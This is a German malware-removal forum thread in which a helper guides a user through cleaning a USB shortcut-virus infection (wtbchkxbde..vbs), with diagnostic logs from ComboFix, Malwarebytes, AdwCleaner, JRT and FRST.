[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-02 06:02	1150280	----a-w-	c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-15 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	164016	----a-w-	c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
Toolbar-Locked - (no file)
HKLM-Run-mwlDaemon - c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-16  03:42:26
ComboFix-quarantined-files.txt  2014-04-16 01:42
.
Vor Suchlauf: 15 Verzeichnis(se), 30.584.696.832 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 33.646.391.296 Bytes frei
.
- - End Of File - - 7B368FD47A4B13E2B05BF79FBA8C7373
         


Alt 16.04.2014, 20:25   #6
schrauber
/// the machine
/// TB-Ausbilder
 

Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Downloade Dir bitte Malwarebytes Anti-Malware
  • Installiere das Programm in den vorgegebenen Pfad. (Bebilderte Anleitung zu MBAM)
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
  • Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.


Downloade Dir bitte AdwCleaner Logo Icon AdwCleaner auf deinen Desktop.
  • Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
  • Starte die AdwCleaner.exe mit einem Doppelklick.
  • Stimme den Nutzungsbedingungen zu.
  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Beende bitte Deine Schutzsoftware um eventuelle Konflikte zu vermeiden.
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


und ein frisches FRST log bitte.
__________________
--> Flash Drive Shortcut Virus wtbchkxbde..vbs

Alt 17.04.2014, 00:18   #7
fxak
 
Flash Drive Shortcut Virus wtbchkxbde..vbs - Standard

Flash Drive Shortcut Virus wtbchkxbde..vbs



Ok, alles erledigt

mbam hat nichts gefunden
mbam.txt:
Code:
ATTFilter
 Malwarebytes Anti-Malware 
www.malwarebytes.org

Suchlauf Datum: 16.04.2014
Suchlauf-Zeit: 23:35:03
Logdatei: mbam.txt
Administrator: Ja

Version: 2.00.1.1004
Malware Datenbank: v2014.04.16.10
Rootkit Datenbank: v2014.03.27.01
Lizenz: Kostenlos
Malware Schutz: Deaktiviert
Bösartiger Webseiten Schutz: Deaktiviert
Chameleon: Deaktiviert

Betriebssystem: Windows 7
CPU: x64
Dateisystem: NTFS
Benutzer: Franz

Suchlauf-Art: Bedrohungs-Suchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 260376
Verstrichene Zeit: 24 Min, 16 Sek

Speicher: Aktiviert
Autostart: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Shuriken: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registrierungsschlüssel: 0
(No malicious items detected)

Registrierungswerte: 0
(No malicious items detected)

Registrierungsdaten: 0
(No malicious items detected)

Ordner: 0
(No malicious items detected)

Dateien: 0
(No malicious items detected)

Physische Sektoren: 0
(No malicious items detected)


(end)
         
adwcleaner hat nur Einstellungen von Chrome gefunden, habe ich gelöscht
AdwCleaner[S1].txt:
Code:
ATTFilter
# AdwCleaner v3.023 - Bericht erstellt am 16/04/2014 um 23:59:49
# Aktualisiert 01/04/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Users\Franz\Desktop\Antivir\Trojanerboard\adwcleaner.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****


***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****


***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476


-\\ Google Chrome v33.0.1750.154

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 17:56:10]
AdwCleaner[R1].txt - [923 octets] - [16/04/2014 23:41:47]
AdwCleaner[S0].txt - [1811 octets] - [11/03/2014 17:57:23]
AdwCleaner[S1].txt - [845 octets] - [16/04/2014 23:59:49]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [904 octets] ##########
         
Habe den AdwCleaner vor 4 Wochen schon mal laufen lassen, das war aber bevor ich diesen Virus bekommen habe, aber vielleicht ists ja trotzdem intressant
AdwCleaner[S0].txt:
Code:
ATTFilter
# AdwCleaner v3.021 - Bericht erstellt am 11/03/2014 um 16:57:23
# Aktualisiert 10/03/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Franz - FRANZ-PC
# Gestartet von : C:\Downloads\Chrome\adwcleaner_3.021.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\ProgramData\Tarma Installer
Ordner Gelöscht : C:\Users\Franz\AppData\Local\Temp\boost_interprocess

***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer

***** [ Browser ] *****

-\\ Internet Explorer v9.0.8112.16476


-\\ Google Chrome v33.0.1750.146

[ Datei : C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [1798 octets] - [11/03/2014 16:56:10]
AdwCleaner[S0].txt - [1663 octets] - [11/03/2014 16:57:23]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1723 octets] ##########
         
Junkware Removal Tool:
jrt.txt:
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.4 (04.06.2014:1)
OS: Windows 7 Home Premium x64
Ran by Franz on 16.04.2014 at 23:46:09,11
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CLASSES_ROOT\CLSID\{80922EE0-8A76-46AE-95D5-BD3C3FE0708D}



~~~ Files



~~~ Folders



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 16.04.2014 at 23:53:19,02
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         

neues FRST-Log:
FRST.txt:

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-04-2014 01
Ran by Franz (administrator) on FRANZ-PC on 17-04-2014 00:04:41
Running from C:\Users\Franz\Desktop
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Normal


==================== Processes (Whitelisted) =================

(AMD) C:\Windows\system32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AMD) C:\Windows\system32\atieclxx.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\adminservice.exe
(Panda Security) C:\Program Files (x86)\Panda USB Vaccine\USBVaccine.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Locktime Software) C:\Program Files\NetLimiter 3\nlsvc.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acer Group) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(Alcor Micro Corp.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Locktime Software) C:\Program Files\NetLimiter 3\NLClientApp.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apntex.exe
(Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\HidFind.exe
(Microsoft Corporation) C:\Windows\System32\wscript.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
